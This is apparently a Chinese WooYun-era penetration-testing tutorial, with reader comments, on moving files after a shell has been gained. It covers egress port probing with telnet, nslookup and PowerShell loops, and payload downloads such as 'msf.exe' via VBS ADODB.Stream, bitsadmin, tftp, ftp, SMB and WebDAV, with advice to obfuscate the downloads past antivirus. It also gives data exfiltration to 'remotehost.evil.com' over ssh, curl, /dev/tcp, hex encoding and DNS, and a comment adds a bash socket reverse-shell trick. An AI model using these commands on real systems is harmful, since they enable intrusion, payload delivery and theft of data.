作者:Mickey和Anthr@X

Windows

1.判断什么端口能出来

有时候有防火墙,你也不知道哪个端口能出来,你只有SHELL,咋判断什么端口能出来呢?如果你是在WIN VISTA以下版本,那么用下面的命令可以啦

FOR /L %i IN (1,1,65535) DO (cmd /c "start /b telnet 1.2.3.4 %i")

用TELNET不停的连接你的1-65535端口,你本地开个TCPDUMP就行了,如果连通了,就OK了.

如果TCP封锁了,可以用UDP

FOR /L %i IN (1,1,65535) DO (cmd /c "start /b nslookup -port=%i wooyun.org 1.2.3.4")

这个就更慢了,但是有效,其中的wooyun.org是你可以设置自己的动态域名

如果是VISTA以后的版本,自带有POWERSHELL:

下面分别是走TCP和UDP的

function sT($IP,$Port) {$Address = [system.net.IPAddress]::Parse($IP);$End = New-Object System.Net.IPEndPoint $address, $port;$Saddrf = [System.Net.Sockets.AddressFamily]::InterNetwork;$Stype = [System.Net.Sockets.SocketType]::Stream;$Ptype = [System.Net.Sockets.ProtocolType]::TCP;$Sock = New-Object System.Net.Sockets.Socket $saddrf, $stype, $ptype;$Sock.TTL = 26;try { $sock.Connect($End);[Byte[]] $Message = [char[]]"w00tw00t";$Sent = $Sock.Send($Message);$sock.EndConnect($Connect)} catch {};$Sock.Close();};1..65535 | %{ sT -IP "1.2.3.4" -Port $_ }
function sU($IP, [int]$Port){$Address = [system.net.IPAddress]::Parse($IP);$End = New-Object System.Net.IPEndPoint($Address, $port);$Saddrf=[System.Net.Sockets.AddressFamily]::InterNetwork;$Stype=[System.Net.Sockets.SocketType]::Dgram;$Ptype=[System.Net.Sockets.ProtocolType]::UDP;$Sock=New-Object System.Net.Sockets.Socket $saddrf, $stype, $ptype;$Sock.TTL = 26;$sock.Connect($end);$Enc=[System.Text.Encoding]::ASCII;$Message = "w00tw00t";$Buffer=$Enc.GetBytes($Message);$Sent=$Sock.Send($Buffer);}; 1..65535 | %{ sU -IP "1.2.3.4" -Port $_ }

2.WIN下传文件

如果是VISTA以下版本,可以用TFTP/FTP/TELNET,这个网上文章很多的了,另外如果你搞的是国外的,不要忘记SMB,如果能走HTTP的80,可以用VBS的ADODB.Stream来下载,不过这个已经被很多杀毒软件杀了,编写的时候编码混淆下就行了.但不保证能过主动防御,还是少用,另外zzzEVAzzz的那个Any2Bat可以直接传文件,就是体积有限制,不能传太大的文件,传小马的话应该可以了.如果能走80的话,还可以尝试下WEBDAV,WIN Vista以后就方便了,直接用内建命令bitsadmin就行了

使用ADODB.Stream来传文件

code 1:

Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP") : objXMLHTTP.open "GET", "http://192.168.1.43/mickey.exe", false : objXMLHTTP.send() : Set objADOStream = CreateObject("ADODB.Stream") : objADOStream.Open : objADOStream.Type = 1 : objADOStream.Write objXMLHTTP.ResponseBody : objADOStream.Position = 0 : Set objFSO = Createobject("Scripting.FileSystemObject") : objADOStream.SaveToFile "C:\msf.exe":objADOStream.Close

code 2:

function HTTPGetDownload(url, file) {
var http = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
http.open("GET", url);
http.send();
var stream = new ActiveXObject("ADODB.Stream");
stream.type = 1;
stream.open();
stream.write(http.responseBody);
stream.saveToFile(file,2); }
HTTPGetDownload("http://1.2.3.4/mickey.exe", "mickey.exe");

使用bitsadmin来传文件:

code 3:

bitsadmin /rawretrun /transfer getfile http://pentest.cc/mickey.exe c:\mickey.exe

走UDP的TFTP:

code 4:

tftp –i 1.2.3.4 GET mickey.exe

使用FTP:

code 5:

echo open 1.2.3.4 > x&echo user 2 2 >> x &echo get mickey.exe >> x &echo quit >> x &ftp -n -s:x

使用TELNET:

情景假设,我是LINUX要传文件到WIN上去

首先我在本地的LINUX上用NC执行

nc -lvp 23 < mickey.txt

然后我在WIN上执行

telnet 我的LINUX主机的IP -f c:\mickey.txt

这样就把我linux主机上的mickey.txt文件拷贝到win主机的c盘下了

使用SMB传送文件:

情景假设,我是LINUX要传文件到WIN上去

首先我在本地的LINUX上配置好SAMBA服务

nano /etc/samba/smb.conf
[hack]
    comment = File Server Share
    path = /tmp/
    browseable = yes
    writable = yes
    guest ok = yes
    read only = no
    create mask = 0755

service samba start

然后我在WIN上执行

C:\>net use z: \\192.168.10.80\hack
copy z:\mickey.exe C:\mickey.exe

通过WEBDAV来传文件:

net use o: "http://192.168.200.18/uploads"
copy z:\mickey.exe C:\mickey.exe

也可以走HTTPS

net use o: "https://192.168.200.18/uploads"

但是需要在主机上开启WebClient服务,才能成功

net start WebClient

下面是Anthr@X牛的,主攻LINUX

Linux

当我们想要把一个服务器里面的数据打包备份到另一个服务器的时候,这些命令可能会有帮助。

1.tar over ssh

一边tar一边通过ssh传到服务器并且自动解压缩,最后会得到远程服务器上文件夹的一份完美备份,并且在目标服务器上不会写入任何文件。

tar zcf - /some/localfolder | ssh remotehost.evil.com "cd /some/path/name; tar zxpf -"

2. rsync over ssh

通过ssh隧道同步,要求是本地服务器要安装了rsync

rsync -aH localhost remotehost.evil.com:/some/path/name

假如ssh默认的22端口被封,那么你可以用ssh -p 或者 rysnc --port指定端口,比如可以把ssh服务器开到80或者443端口。

如果连SSH协议都被封了呢,怎么换端口都没用怎么办?别怕,我们可以把数据通过https发送:

tar zcf - localfolder | curl -F "data=@-" https://remotehost.evil.com/script.php

curl -F 表示通过伪表单用Post方式发送数据

当然,你还要在本地建一个script.php用来收取数据然后写入到文件才行,并且web服务器要支持ssl并且有https证书。

不过curl在很多linux发行版里面都没有默认安装,所以还是有时候还是不太靠谱。

那么现在不能用ssh也不能用curl,那怎么办?

直接通过tcp发送

tar zcf - localfolder >/dev/tcp/remotehost.evil.com/443

大家看这个方式是不是有点眼熟?没错,就是和弹shell的方法差不多,只不过这次我们用来传送文件。

效果和用nc传文件是一样的。假如远程服务器和网络还有内容检测的话,我们还可以对文件进行一些编码来混淆,比如用xxd命令转换成16进制 dump

tar zcf - localfolder | xxd -p >/dev/tcp/remotehost.evil.com/443

本地服务器可以用xxd -r来还原源文件

其实除了xxd,用 base64也不错,就是有点明显……

更奇葩的方法,用DNS来传送数据:

tar zcf - localfolder | xxd -p -c 16 |
    while read line; do host $line.domain.com remotehost.evil.com; done

把打包后的数据用16进制编码,每行16字节,这样在通过dns发送到时候就不会因为超长导致出错。然后我们限制每次只发送1个ping数据包,减少发送时间。至于怎么还原,那就要看你的了。

[原文地址]

相关讨论:

livers | 2013/12/10 16:40 | #

linux 还可以 socket bash 传输

exec 8/dev/tcp/www.xxxx.com/80
echo -ne "POST / HTTP/1.0\r\nHost: http://www.xxx.com\r\nConnection: Close\r\n\r\n .... xxxxxxxxxxx\r\n" >&8
cat <&8

没有nc 的情况下可以用exec 6这个做反弹.

Master | 2013/12/11 09:27 | #

Mark张姿势了,膜拜Mickey牛。。。。。。。。

xsser | 2013/12/11 10:46 | #

一般是先写个vbs然后传nc然后就好了

袋鼠妈妈 | 2013/12/11 21:41 | #

膜拜Mickey牛~~

小胖子 | 2013/12/12 09:45 | #

膜拜中。。。

g0t3n | 2013/12/13 09:52 | #

@mickey 又来放干货了

核攻击 | 2013/12/17 15:50 | #

@mickey

FOR /L %i IN (1,1,65535) DO (cmd /c "start /b telnet 1.2.3.4 %i")
FOR /L %i IN (1,1,65535) DO (cmd /c "start /b nslookup -port=%i wooyun.org 1.2.3.4")

楼主你确定你试过?秒死机的干活!!!

淡漠天空 | 2013/12/17 15:51 | #

膜拜中。。。

核攻击 | 2013/12/17 16:05 | #

@mickey

FOR /L %i IN (1,1,65535) DO (cmd /c "start /b telnet 1.2.3.4 %i")
FOR /L %i IN (1,1,65535) DO (cmd /c "start /b nslookup -port=%i http://www.baidu.com 1.2.3.4")

楼主你确定你试过?秒死机的干活!!!

留言评论(旧系统):

flowind @ 2013-12-17 23:19:07

上面的方法都是整个弄下来. 实际上里面很多都是无用的. 既然条件是有个shell了..那么就直接连接批量读出我们需要的就好. 写在日志里面就好了.然后cat...不就出来了? 或者直接写个循环脚本也很不错.到时候直接弄日志就好了.. 不卡机.速度也快..

本站回复:

嗯,是滴,好方法!